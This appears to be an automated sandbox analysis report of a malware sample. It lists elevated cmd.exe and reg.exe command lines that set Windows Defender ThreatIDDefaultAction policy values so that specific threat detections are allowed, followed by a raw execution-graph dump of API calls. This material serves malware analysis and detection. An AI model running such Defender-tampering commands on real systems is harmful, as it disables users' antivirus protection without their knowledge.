                            MD5 hash:C48CBDC676E442BAF58920C5B7E556DE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:38
                            Start time:19:04:51
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                            Imagebase:0x11d0000
                            File size:232960 bytes
                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:39
                            Start time:19:04:51
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                            Imagebase:0xbe0000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:40
                            Start time:19:04:52
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                            Imagebase:0xbe0000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:41
                            Start time:19:04:53
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                            Imagebase:0xbe0000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:42
                            Start time:19:04:53
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                            Imagebase:0xbe0000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:43
                            Start time:19:04:54
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                            Imagebase:0xbe0000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:44
                            Start time:19:04:54
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                            Imagebase:0xbe0000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:45
                            Start time:19:04:54
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                            Imagebase:0xbe0000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:46
                            Start time:19:04:55
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                            Imagebase:0xbe0000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:47
                            Start time:19:04:56
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                            Imagebase:0xbe0000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:48
                            Start time:19:04:56
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                            Imagebase:0xbe0000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:49
                            Start time:19:04:57
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                            Imagebase:0xbe0000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:50
                            Start time:19:04:57
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                            Imagebase:0xbe0000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:51
                            Start time:19:04:58
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                            Imagebase:0xbe0000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:53
                            Start time:19:04:58
                            Start date:24/11/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                            Imagebase:0xbe0000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                              Execution Graph

                              Execution Coverage:15%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:2.3%
                              Total number of Nodes:2000
                              Total number of Limit Nodes:44
API calls 14276->14277 14278 4050ee 14277->14278 14288 4050ab 14278->14288 14280 4050ff 14281 405111 14280->14281 14293 4052f9 14280->14293 14281->14256 14283 4047db 14281->14283 14284 4047e9 14283->14284 14285 4047ef GetWindowsDirectoryA 14283->14285 14286 40243e 30 API calls 14284->14286 14287 404802 14285->14287 14286->14285 14287->14254 14289 4050c0 14288->14289 14290 4050c8 GetTempFileNameA 14288->14290 14291 40243e 30 API calls 14289->14291 14292 4050dd 14290->14292 14291->14290 14292->14280 14294 405305 14293->14294 14296 405316 14293->14296 14295 40243e 30 API calls 14294->14295 14295->14296 14296->14281 14298 40243e 30 API calls 14297->14298 14299 404d68 14298->14299 14300 405806 14299->14300 14301 405810 __EH_prolog 14300->14301 14306 40553a 14301->14306 14307 40551a FindClose 14306->14307 14308 40554b 14307->14308 14309 405566 14308->14309 14310 40554f FindFirstFileA 14308->14310 14313 40551a 14309->14313 14310->14309 14311 40556a 14310->14311 14316 40557f 14311->14316 14314 405524 FindClose 14313->14314 14315 40552f 14313->14315 14314->14315 14315->14263 14317 4055bd 14316->14317 14318 4046ab 30 API calls 14317->14318 14319 4055da 14318->14319 14319->14309 14325 40489c SetFileAttributesA 14320->14325 14322 404be6 14323 404bea 14322->14323 14324 404bec DeleteFileA 14322->14324 14323->14270 14324->14270 14325->14322 14326->13928 14328 402170 30 API calls 14327->14328 14329 4081c8 14328->14329 14329->13934 14331 407f10 __EH_prolog 14330->14331 14332 401c80 30 API calls 14331->14332 14333 407f67 14331->14333 14334 407f4c 14332->14334 14335 401c80 30 API calls 14333->14335 14355 407f93 14333->14355 14373 408062 14334->14373 14339 407f78 14335->14339 14336 408018 14338 4042d6 ctype 34 API calls 14336->14338 14341 408027 14338->14341 14342 408062 35 API calls 14339->14342 14344 4042ad ctype 34 API calls 14341->14344 14345 407f87 14342->14345 14343 403a9c ctype 29 API calls 14343->14333 14347 408033 14344->14347 14348 403a9c ctype 29 API calls 14345->14348 
14346 402ee1 30 API calls 14346->14355 14349 4042d6 ctype 34 API calls 14347->14349 14348->14355 14350 408045 14349->14350 14351 4042ad ctype 34 API calls 14350->14351 14352 408051 14351->14352 14352->13934 14353 401d7a 30 API calls 14353->14355 14355->14336 14355->14346 14355->14353 14356 403a9c 29 API calls ctype 14355->14356 14386 4081e7 14355->14386 14356->14355 14358 408252 __EH_prolog 14357->14358 14359 403a76 30 API calls 14358->14359 14360 40825d 14359->14360 14361 408274 14360->14361 14426 40828f 14360->14426 14363 4039df 30 API calls 14361->14363 14364 408280 14363->14364 14364->13934 14366 40209c __EH_prolog 14365->14366 14367 4042d6 ctype 34 API calls 14366->14367 14368 4020c0 14367->14368 14369 4042ad ctype 34 API calls 14368->14369 14370 4020cb 14369->14370 14371 403a9c ctype 29 API calls 14370->14371 14372 4020d3 14371->14372 14372->13934 14374 40806c __EH_prolog 14373->14374 14375 4042d6 ctype 34 API calls 14374->14375 14376 40807e 14375->14376 14377 402170 30 API calls 14376->14377 14378 408093 14377->14378 14379 4080ef 14378->14379 14381 4080de 14378->14381 14383 401db8 30 API calls 14378->14383 14396 403998 14378->14396 14380 403a9c ctype 29 API calls 14379->14380 14382 407f5b 14380->14382 14381->14379 14384 403998 30 API calls 14381->14384 14382->14343 14383->14378 14384->14379 14387 4081f1 __EH_prolog 14386->14387 14388 403a76 30 API calls 14387->14388 14389 4081fd 14388->14389 14390 408227 14389->14390 14391 401ce1 30 API calls 14389->14391 14393 4039df 30 API calls 14390->14393 14392 408217 14391->14392 14394 401ce1 30 API calls 14392->14394 14395 408238 14393->14395 14394->14390 14395->14355 14397 4039a2 __EH_prolog 14396->14397 14398 403a76 30 API calls 14397->14398 14399 4039ad 14398->14399 14400 4039c4 14399->14400 14401 401ce1 30 API calls 14399->14401 14404 4039df 14400->14404 14401->14400 14403 4039d0 14403->14378 14407 4042ff 14404->14407 14408 4039e7 14407->14408 14409 404307 14407->14409 14408->14403 14411 404327 14409->14411 14412 
4043cb 14411->14412 14413 40433b 14411->14413 14412->14408 14414 404358 14413->14414 14423 413d3d RaiseException 14413->14423 14416 40437f 14414->14416 14424 413d3d RaiseException 14414->14424 14418 403a76 30 API calls 14416->14418 14422 4043a7 14416->14422 14420 40438b 14418->14420 14419 403a9c ctype 29 API calls 14419->14412 14420->14422 14425 413d3d RaiseException 14420->14425 14422->14419 14423->14414 14424->14416 14425->14422 14427 408299 __EH_prolog 14426->14427 14428 401ce1 30 API calls 14427->14428 14429 4082c0 14428->14429 14432 4082e8 14429->14432 14433 4082f2 __EH_prolog 14432->14433 14434 4042d6 ctype 34 API calls 14433->14434 14435 408319 14434->14435 14438 408334 14435->14438 14439 404327 30 API calls 14438->14439 14440 40834c 14439->14440 14441 4082d0 14440->14441 14442 4081e7 30 API calls 14440->14442 14441->14361 14442->14440 14444 403380 __EH_prolog 14443->14444 14445 402170 30 API calls 14444->14445 14446 40339c 14445->14446 14447 402170 30 API calls 14446->14447 14448 4033b1 14447->14448 14449 402170 30 API calls 14448->14449 14450 402f3e 14449->14450 14450->13947 14452 40311d __EH_prolog 14451->14452 14547 402ee1 14452->14547 14457 403141 14458 401d1b 30 API calls 14457->14458 14459 40314f 14458->14459 14461 403a9c ctype 29 API calls 14459->14461 14460 403158 14556 408f0a 14460->14556 14494 4031c1 14461->14494 14463 403198 14464 4042ad ctype 34 API calls 14463->14464 14465 4031a6 14464->14465 14466 4031c6 14465->14466 14467 4031ab 14465->14467 14468 401ce1 30 API calls 14466->14468 14469 401d1b 30 API calls 14467->14469 14470 4031d2 14468->14470 14469->14459 14471 405d0b 30 API calls 14470->14471 14472 4031de 14471->14472 14616 4049dd 14472->14616 14475 40322a 14477 401c80 30 API calls 14475->14477 14476 4031ea 14743 409569 14476->14743 14479 403237 14477->14479 14651 402685 14479->14651 14485 403a9c ctype 29 API calls 14487 403269 14485->14487 14658 40bbc9 14487->14658 14707 40c231 14487->14707 14491 403284 14494->13959 14500 403494 
__EH_prolog 14499->14500 14501 403a9c ctype 29 API calls 14500->14501 14502 4034aa 14501->14502 16086 40341c 14502->16086 14505 403a9c ctype 29 API calls 14506 4034cc 14505->14506 14507 403a9c ctype 29 API calls 14506->14507 14508 401581 14507->14508 14508->13494 14508->13495 14510 4034ed __EH_prolog 14509->14510 14511 402170 30 API calls 14510->14511 14512 40351f 14511->14512 14513 402170 30 API calls 14512->14513 14514 403535 14513->14514 14515 402170 30 API calls 14514->14515 14516 40354b 14515->14516 14517 402170 30 API calls 14516->14517 14518 403564 14517->14518 16096 4035a6 14518->16096 14521 402170 30 API calls 14522 403589 14521->14522 14522->13954 16115 4148be 14523->16115 14526 413243 14526->13960 14527 413248 GetLastError 14528 413252 14527->14528 14528->13960 14530 4131e9 CloseHandle 14529->14530 14532 402fd0 14529->14532 14531 4131f4 GetLastError 14530->14531 14530->14532 14531->14532 14532->13968 14534 4030a7 __EH_prolog 14533->14534 14535 401d7a 30 API calls 14534->14535 14536 4030bc 14535->14536 16145 40620b 14536->16145 14540 4030d4 14541 40602f 33 API calls 14540->14541 14542 4030df 14541->14542 16165 406049 14542->16165 14545 403a9c ctype 29 API calls 14546 4030f5 ShowWindow 14545->14546 14546->13980 14548 402170 30 API calls 14547->14548 14549 402ef5 14548->14549 14550 405841 14549->14550 14551 40584b __EH_prolog 14550->14551 14751 4055de 14551->14751 14554 40551a FindClose 14555 40313d 14554->14555 14555->14457 14555->14460 14557 408f14 __EH_prolog 14556->14557 14558 403a76 30 API calls 14557->14558 14559 408f31 14558->14559 14560 408f43 14559->14560 14873 409184 14559->14873 14562 402170 30 API calls 14560->14562 14563 408f7a 14562->14563 14564 402170 30 API calls 14563->14564 14565 408f91 14564->14565 14566 402170 30 API calls 14565->14566 14567 408fa8 14566->14567 14568 40906f 14567->14568 14792 404e76 14567->14792 14847 408a3b 14568->14847 14573 408fd3 GetLastError 14577 403a9c ctype 29 API calls 14573->14577 14574 40900e 14578 401e3a 30 
API calls 14574->14578 14575 4090a1 14580 403a9c ctype 29 API calls 14575->14580 14576 4090d5 14582 402634 30 API calls 14576->14582 14581 408fe3 14577->14581 14579 40901d 14578->14579 14583 401d7a 30 API calls 14579->14583 14584 4090a9 14580->14584 14585 403a9c ctype 29 API calls 14581->14585 14586 4090e4 14582->14586 14587 40902a 14583->14587 14588 403a9c ctype 29 API calls 14584->14588 14589 408feb 14585->14589 14590 403998 30 API calls 14586->14590 14592 403a9c ctype 29 API calls 14587->14592 14593 4090b1 14588->14593 14594 403a9c ctype 29 API calls 14589->14594 14591 4090f3 14590->14591 14595 403a9c ctype 29 API calls 14591->14595 14596 409036 14592->14596 14597 403a9c ctype 29 API calls 14593->14597 14599 408ff3 14594->14599 14605 4090ff 14595->14605 14598 401e19 30 API calls 14596->14598 14597->14599 14601 409046 14598->14601 14599->14463 14600 409135 14604 403a9c ctype 29 API calls 14600->14604 14603 401d7a 30 API calls 14601->14603 14602 402634 30 API calls 14602->14605 14606 409053 14603->14606 14607 409152 14604->14607 14605->14600 14605->14602 14608 403998 30 API calls 14605->14608 14613 403a9c ctype 29 API calls 14605->14613 14609 403a9c ctype 29 API calls 14606->14609 14610 403a9c ctype 29 API calls 14607->14610 14608->14605 14611 40905f 14609->14611 14612 40915a 14610->14612 14833 4092e9 14611->14833 14615 403a9c ctype 29 API calls 14612->14615 14613->14605 14615->14599 14617 4049e7 __EH_prolog 14616->14617 14618 401c80 30 API calls 14617->14618 14623 4049f6 14618->14623 14619 401ce1 30 API calls 14621 404a56 14619->14621 14622 404a6d GetLastError 14621->14622 14629 404bb2 14621->14629 14641 401e3a 30 API calls 14621->14641 14642 404b41 14621->14642 14646 401d7a 30 API calls 14621->14646 14650 403a9c ctype 29 API calls 14621->14650 15446 40499c 14621->15446 14622->14621 14624 404aea 14622->14624 14623->14619 14633 404a38 14623->14633 14626 402ee1 30 API calls 14624->14626 14625 401d7a 30 API calls 14647 404b4e 14625->14647 14628 404af2 14626->14628 
14627 403a9c ctype 29 API calls 14631 4031e6 14627->14631 14632 405841 37 API calls 14628->14632 14630 403a9c ctype 29 API calls 14629->14630 14630->14633 14631->14475 14631->14476 14634 404b01 14632->14634 14633->14627 14635 404b05 14634->14635 14636 404b35 14634->14636 14637 403a9c ctype 29 API calls 14635->14637 14639 403a9c ctype 29 API calls 14636->14639 14640 404b1d 14637->14640 14638 401e3a 30 API calls 14638->14647 14639->14642 14643 403a9c ctype 29 API calls 14640->14643 14641->14621 14642->14625 14645 404b25 14643->14645 14644 40499c 34 API calls 14644->14647 14648 403a9c ctype 29 API calls 14645->14648 14646->14621 14647->14629 14647->14638 14647->14644 14649 403a9c ctype 29 API calls 14647->14649 14648->14631 14649->14647 14650->14621 14652 401d7a 30 API calls 14651->14652 14653 4026ac 14652->14653 14654 401d7a 30 API calls 14653->14654 14655 4026d8 14654->14655 14656 405d0b 30 API calls 14655->14656 14657 4026df 14656->14657 14657->14485 14671 40bbd3 __EH_prolog 14658->14671 14659 40bd4e 14660 40bd90 14659->14660 14661 40bd63 14659->14661 14665 403a76 30 API calls 14660->14665 14663 4042d6 ctype 34 API calls 14661->14663 14666 40c46d 35 API calls 14666->14671 14668 4042ad 34 API calls ctype 14668->14671 14671->14659 14671->14666 14671->14668 14684 40bc23 14671->14684 15576 40c30e 14671->15576 15582 40c281 14671->15582 15586 40c413 14671->15586 14684->14491 14708 40bdf7 14707->14708 14709 40be1c 14708->14709 14710 40be78 14708->14710 14712 403a76 30 API calls 14708->14712 14718 40c5e8 30 API calls 14708->14718 14721 40be5b 14708->14721 14722 40c73a 62 API calls 14708->14722 14723 40bf45 14708->14723 14726 40ad19 81 API calls 14708->14726 14730 40ca4c 62 API calls 14708->14730 14731 40c0f3 14708->14731 14732 40c059 14708->14732 14733 40c0b5 14708->14733 14736 40c156 14708->14736 14711 40c380 34 API calls 14709->14711 14714 40c380 34 API calls 14710->14714 14712->14708 14718->14708 14721->14491 14722->14708 14724 40c380 34 API calls 14723->14724 14725 
40bf76 14724->14725 14726->14708 14730->14708 14734 40c380 34 API calls 14731->14734 14737 40c380 34 API calls 14732->14737 14738 40c380 34 API calls 14733->14738 14741 40c380 34 API calls 14736->14741 14744 409573 __EH_prolog 14743->14744 14745 40602f 33 API calls 14744->14745 14746 409585 14745->14746 16072 4094f6 14746->16072 14752 4055e8 __EH_prolog 14751->14752 14753 40551a FindClose 14752->14753 14754 4055f6 14753->14754 14755 405607 FindFirstFileW 14754->14755 14756 40562e 14754->14756 14761 40562c 14754->14761 14757 40561e 14755->14757 14755->14761 14758 401c80 30 API calls 14756->14758 14769 4056a6 14757->14769 14760 405639 AreFileApisANSI 14758->14760 14762 403d04 31 API calls 14760->14762 14761->14554 14763 405654 FindFirstFileA 14762->14763 14764 403a9c ctype 29 API calls 14763->14764 14765 40566e 14764->14765 14766 403a9c ctype 29 API calls 14765->14766 14767 40567a 14766->14767 14767->14761 14773 405705 14767->14773 14770 4056e4 14769->14770 14771 401d1b 30 API calls 14770->14771 14772 405701 14771->14772 14772->14761 14774 40570f __EH_prolog 14773->14774 14785 4052b2 14774->14785 14779 401d7a 30 API calls 14780 405794 14779->14780 14781 403a9c ctype 29 API calls 14780->14781 14782 40579c 14781->14782 14783 403a9c ctype 29 API calls 14782->14783 14784 4057a4 14783->14784 14784->14761 14786 4052c9 14785->14786 14787 40243e 30 API calls 14786->14787 14788 4052d8 AreFileApisANSI 14787->14788 14789 4057b5 14788->14789 14790 403b9c 31 API calls 14789->14790 14791 405787 14790->14791 14791->14779 14793 404e80 __EH_prolog 14792->14793 14794 404ea2 14793->14794 14795 404f2d 14793->14795 14797 404eb7 GetFullPathNameW 14794->14797 14799 402170 30 API calls 14794->14799 14796 40243e 30 API calls 14795->14796 14798 404f40 14796->14798 14802 404ed8 14797->14802 14881 4048ff 14798->14881 14799->14797 14802->14573 14802->14574 14805 403a9c ctype 29 API calls 14806 404f76 14805->14806 14807 404f8b 14806->14807 14808 404f7b 14806->14808 14896 405352 14807->14896 14809 
403a9c ctype 29 API calls 14808->14809 14809->14802 14814 403a9c ctype 29 API calls 14815 404fb3 14814->14815 14902 405331 14815->14902 14818 404818 32 API calls 14819 404fd0 14818->14819 14820 403a9c ctype 29 API calls 14819->14820 14821 404fdc 14820->14821 14822 402634 30 API calls 14821->14822 14823 404ff1 14822->14823 14824 401d7a 30 API calls 14823->14824 14825 404ffd 14824->14825 14834 4092f3 __EH_prolog 14833->14834 14835 401d7a 30 API calls 14834->14835 14836 409308 14835->14836 14837 402634 30 API calls 14836->14837 14838 409315 14837->14838 14839 405841 37 API calls 14838->14839 14840 409324 14839->14840 14841 403a9c ctype 29 API calls 14840->14841 14842 409338 14841->14842 14843 409352 14842->14843 14918 413d3d RaiseException 14842->14918 14845 4042d6 ctype 34 API calls 14843->14845 14846 40935a 14845->14846 14846->14568 14861 408a45 __EH_prolog 14847->14861 14848 408ea0 30 API calls 14848->14861 14849 408cfb 14852 405e34 VariantClear 14849->14852 14850 401d7a 30 API calls 14850->14861 14851 408e75 14854 405e34 VariantClear 14851->14854 14860 408a61 14852->14860 14854->14860 14855 408ce8 15029 4038c2 14855->15029 14857 4093f0 30 API calls 14857->14861 14859 4038c2 29 API calls 14859->14861 14860->14575 14860->14576 14861->14848 14861->14849 14861->14850 14861->14851 14861->14855 14861->14857 14861->14859 14861->14860 14863 408d0e 14861->14863 14866 408d55 14861->14866 14867 408dae 14861->14867 14871 408e06 14861->14871 14919 408902 14861->14919 14932 405e34 14861->14932 14936 40836d 14861->14936 14961 408524 14861->14961 15025 40848c 14861->15025 14864 4038c2 29 API calls 14863->14864 14864->14860 14869 4038c2 29 API calls 14866->14869 14870 4038c2 29 API calls 14867->14870 14869->14860 14870->14860 14872 4038c2 29 API calls 14871->14872 14872->14860 14874 40918e __EH_prolog 14873->14874 14875 402170 30 API calls 14874->14875 14876 4091c1 14875->14876 15443 40590e 14876->15443 14879 402170 30 API calls 14880 4091e2 14879->14880 14880->14560 14882 404909 
__EH_prolog 14881->14882 14883 401c80 30 API calls 14882->14883 14884 40491c AreFileApisANSI 14883->14884 14885 403d04 31 API calls 14884->14885 14886 404936 14885->14886 14887 403a9c ctype 29 API calls 14886->14887 14888 40493e 14887->14888 14889 404df9 14888->14889 14890 404e26 GetFullPathNameA 14889->14890 14891 404e1e 14889->14891 14893 404e45 14890->14893 14892 40243e 30 API calls 14891->14892 14892->14890 14894 404e50 14893->14894 14895 404e5b lstrlenA 14893->14895 14894->14805 14895->14894 14905 40536e 14896->14905 14899 404818 AreFileApisANSI 14900 403b9c 31 API calls 14899->14900 14901 404839 14900->14901 14901->14814 14903 40536e 30 API calls 14902->14903 14904 404fc2 14903->14904 14904->14818 14907 405378 __EH_prolog 14905->14907 14906 4053ac 14909 40243e 30 API calls 14906->14909 14907->14906 14908 4053a1 14907->14908 14910 403d24 30 API calls 14908->14910 14911 4053bf 14909->14911 14912 404f99 14910->14912 14913 40243e 30 API calls 14911->14913 14912->14899 14914 4053cc 14913->14914 14915 403d24 30 API calls 14914->14915 14916 4053fa 14915->14916 14917 403a9c ctype 29 API calls 14916->14917 14917->14912 14918->14843 14920 40890c __EH_prolog 14919->14920 14921 408927 14920->14921 14922 40894b 14920->14922 14923 403a76 30 API calls 14921->14923 14925 403a76 30 API calls 14922->14925 14927 40892e 14922->14927 14923->14927 14924 408524 86 API calls 14926 4089b8 14924->14926 14928 408957 14925->14928 14926->14861 14927->14924 15036 406434 14928->15036 14931 408994 GetLastError 14931->14926 14935 405e39 14932->14935 14933 405e5a VariantClear 14933->14861 14934 405e71 14934->14861 14935->14933 14935->14934 14937 408377 __EH_prolog 14936->14937 14938 4083a3 14937->14938 14939 4083b6 14937->14939 14940 405e34 VariantClear 14938->14940 14941 4083cc 14939->14941 14942 4083bd 14939->14942 14945 4083af 14940->14945 14943 4083ca 14941->14943 14944 40846a 14941->14944 14946 401d1b 30 API calls 14942->14946 14948 405e34 VariantClear 14943->14948 14947 405e34 
VariantClear 14944->14947 14945->14861 14946->14943 14947->14945 14949 4083ed 14948->14949 14949->14945 14950 401d7a 30 API calls 14949->14950 14951 4083fd 14950->14951 14952 408421 14951->14952 14953 40842c 14951->14953 14954 40844f 14951->14954 14956 405e34 VariantClear 14952->14956 14957 401db8 30 API calls 14953->14957 14954->14952 14955 40843f 14954->14955 14958 405e34 VariantClear 14955->14958 14956->14945 14959 408435 14957->14959 14958->14945 15039 407d25 14959->15039 14963 40852e __EH_prolog 14961->14963 15047 40455d 14963->15047 14965 402170 30 API calls 14967 408570 14965->14967 14966 4085c4 14968 4085df 14966->14968 14980 4085ef 14966->14980 14967->14966 14972 401e19 30 API calls 14967->14972 14969 4039df 30 API calls 14968->14969 14987 4085ea 14969->14987 14970 40863c 14970->14987 15016 408648 14970->15016 15090 4042eb 14970->15090 14973 4085ab 14972->14973 14974 401d7a 30 API calls 14973->14974 14977 4085b8 14974->14977 14981 403a9c ctype 29 API calls 14977->14981 14978 4039df 30 API calls 14978->14980 14979 4042ad ctype 34 API calls 14982 408742 14979->14982 14980->14970 14980->14978 15083 4088ce 14980->15083 15087 404407 14980->15087 14981->14966 14983 403a9c ctype 29 API calls 14982->14983 14984 40874a 14983->14984 14985 403a9c ctype 29 API calls 14984->14985 14986 408752 14985->14986 14986->14861 14988 40876b 14987->14988 14992 4087a1 14987->14992 14987->15016 15051 4065b2 14987->15051 15057 40df69 14987->15057 15063 40d1ab 14987->15063 14989 4042ad ctype 34 API calls 14988->14989 14990 408788 14989->14990 14991 403a9c ctype 29 API calls 14990->14991 14994 408790 14991->14994 14993 4087f8 14992->14993 14997 401d1b 30 API calls 14992->14997 14992->15016 14995 405e34 VariantClear 14993->14995 14996 403a9c ctype 29 API calls 14994->14996 14998 408804 14995->14998 14996->14986 14997->14993 14999 408879 14998->14999 15000 40881d 14998->15000 15001 4088ce 5 API calls 14999->15001 15002 401c80 30 API calls 15000->15002 15003 408884 15001->15003 15004 
40882b 15002->15004 15006 407d82 35 API calls 15003->15006 15005 401c80 30 API calls 15004->15005 15007 408838 15005->15007 15008 4088a0 15006->15008 15094 407d82 15007->15094 15010 401d7a 30 API calls 15008->15010 15012 4088ad 15010->15012 15014 403a9c ctype 29 API calls 15012->15014 15013 401d7a 30 API calls 15015 40885c 15013->15015 15014->15016 15017 403a9c ctype 29 API calls 15015->15017 15016->14979 15026 408496 __EH_prolog 15025->15026 15027 405e34 VariantClear 15026->15027 15028 408511 15027->15028 15028->14861 15030 403a9c ctype 29 API calls 15029->15030 15031 4038cd 15030->15031 15032 403a9c ctype 29 API calls 15031->15032 15033 4038d5 15032->15033 15034 403a9c ctype 29 API calls 15033->15034 15035 4038dd 15034->15035 15035->14860 15037 405b6d 35 API calls 15036->15037 15038 406440 15037->15038 15038->14927 15038->14931 15040 407d3a 15039->15040 15040->15040 15043 4021c4 15040->15043 15044 402208 15043->15044 15045 4021d8 15043->15045 15044->14955 15046 402170 30 API calls 15045->15046 15046->15044 15048 40456d 15047->15048 15049 401e19 30 API calls 15048->15049 15050 404592 15049->15050 15050->14965 15052 4065c2 15051->15052 15053 4065bb 15051->15053 15104 405ace SetFilePointer 